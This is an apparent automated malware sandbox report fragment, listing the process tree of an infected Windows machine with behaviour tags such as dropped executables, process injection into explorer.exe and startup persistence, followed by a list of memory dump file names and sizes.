                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5088
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                              1⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:3180
                                                                            • C:\Users\Admin\AppData\Local\Temp\EC16.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\EC16.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:5388
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                2⤵
                                                                                  PID:1260
                                                                              • C:\Users\Admin\AppData\Local\Temp\F435.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\F435.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:6088
                                                                              • C:\Users\Admin\AppData\Local\Temp\FDFA.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\FDFA.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Drops startup file
                                                                                • Loads dropped DLL
                                                                                • NTFS ADS
                                                                                PID:4784
                                                                              • C:\Users\Admin\AppData\Local\Temp\687.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\687.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:4824
                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                1⤵
                                                                                  PID:2184
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe
                                                                                  1⤵
                                                                                    PID:5632
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:4148
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:2172
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:4992
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe
                                                                                        1⤵
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:4612
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:1740
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5044
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:4300
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                            1⤵
                                                                                              PID:3488
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                              1⤵
                                                                                                PID:1500
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                1⤵
                                                                                                  PID:5484
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                  1⤵
                                                                                                    PID:4116
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5020
                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:5648
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5880
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:4376
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:5528

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • memory/860-222-0x0000017788C20000-0x0000017788C90000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/992-207-0x000001C36E820000-0x000001C36E890000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/1060-126-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                    Filesize

                                                                                                    88KB

                                                                                                  • memory/1072-223-0x000001DBA6640000-0x000001DBA66B0000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/1172-236-0x000002A9DED60000-0x000002A9DEDD0000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/1360-243-0x0000023B72C60000-0x0000023B72CD0000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/1392-230-0x000001BF8C1A0000-0x000001BF8C210000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/1568-118-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/1756-152-0x0000000000C65000-0x0000000000C66000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/1756-146-0x0000000000C60000-0x0000000000C62000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/1756-148-0x0000000000C62000-0x0000000000C64000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/1808-114-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                    Filesize

                                                                                                    172KB

                                                                                                  • memory/1860-235-0x000001F45DA90000-0x000001F45DB00000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/2316-343-0x00000000070D0000-0x00000000070D1000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2316-344-0x00000000070D2000-0x00000000070D3000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2316-346-0x00000000070D3000-0x00000000070D4000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2408-213-0x000002AEDE870000-0x000002AEDE8E0000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/2436-206-0x000001B0B5580000-0x000001B0B55F0000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/2496-149-0x0000000002155000-0x0000000002157000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2496-150-0x0000000002154000-0x0000000002155000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2496-140-0x0000000002150000-0x0000000002152000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2496-147-0x0000000002152000-0x0000000002154000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2700-244-0x00000239B2C40000-0x00000239B2CB0000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/2720-249-0x0000017D1F080000-0x0000017D1F0F0000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/2740-200-0x000002115CE00000-0x000002115CE70000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/2784-141-0x0000000002E70000-0x0000000002E72000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/3016-298-0x0000000002FC0000-0x0000000002FD5000-memory.dmp

                                                                                                    Filesize

                                                                                                    84KB

                                                                                                  • memory/3016-293-0x0000000001280000-0x0000000001297000-memory.dmp

                                                                                                    Filesize

                                                                                                    92KB

                                                                                                  • memory/3764-123-0x0000000002BB0000-0x0000000002BB2000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/3872-134-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3928-185-0x00000154A0EB0000-0x00000154A0EFB000-memory.dmp

                                                                                                    Filesize

                                                                                                    300KB

                                                                                                  • memory/3928-189-0x00000154A0F70000-0x00000154A0FE0000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/4228-278-0x0000000000030000-0x000000000003C000-memory.dmp

                                                                                                    Filesize

                                                                                                    48KB

                                                                                                  • memory/4564-338-0x0000000002E30000-0x0000000002E40000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/4652-184-0x0000000002917000-0x0000000002A18000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.0MB

                                                                                                  • memory/4652-188-0x0000000004380000-0x00000000043DC000-memory.dmp

                                                                                                    Filesize

                                                                                                    368KB

                                                                                                  • memory/4824-308-0x0000000007B30000-0x0000000007B31000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-330-0x0000000009DA0000-0x0000000009DA1000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-300-0x0000000006D50000-0x0000000006D51000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-301-0x0000000007480000-0x0000000007481000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-302-0x0000000006E40000-0x0000000006E41000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-303-0x0000000006E42000-0x0000000006E43000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-304-0x0000000007440000-0x0000000007441000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-305-0x0000000007D00000-0x0000000007D01000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-306-0x0000000007C90000-0x0000000007C91000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-307-0x0000000007E50000-0x0000000007E51000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-339-0x0000000006E43000-0x0000000006E44000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-309-0x0000000008700000-0x0000000008701000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-310-0x00000000084F0000-0x00000000084F1000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-337-0x000000000A920000-0x000000000A921000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-329-0x0000000009460000-0x0000000009461000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-328-0x0000000009370000-0x0000000009371000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4824-327-0x0000000009800000-0x0000000009801000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4908-157-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/4908-158-0x0000000000430000-0x000000000057A000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.3MB

                                                                                                  • memory/4944-288-0x0000000000400000-0x0000000000E36000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.2MB

                                                                                                  • memory/4944-284-0x0000000001770000-0x000000000207B000-memory.dmp

                                                                                                    Filesize

                                                                                                    9.0MB

                                                                                                  • memory/5128-289-0x00000000048E0000-0x0000000004971000-memory.dmp

                                                                                                    Filesize

                                                                                                    580KB

                                                                                                  • memory/5128-290-0x0000000000400000-0x0000000002BF4000-memory.dmp

                                                                                                    Filesize

                                                                                                    40.0MB

                                                                                                  • memory/5320-294-0x000001F6A5290000-0x000001F6A538F000-memory.dmp

                                                                                                    Filesize

                                                                                                    1020KB

                                                                                                  • memory/5320-202-0x000001F6A2E00000-0x000001F6A2E70000-memory.dmp

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/5564-275-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                    Filesize

                                                                                                    48KB

                                                                                                  • memory/5748-283-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                    Filesize

                                                                                                    36KB

                                                                                                  • memory/5748-286-0x0000000000400000-0x0000000003D9C000-memory.dmp

                                                                                                    Filesize

                                                                                                    57.6MB

                                                                                                  • memory/5952-263-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/5952-264-0x00000000005A0000-0x00000000005B2000-memory.dmp

                                                                                                    Filesize

                                                                                                    72KB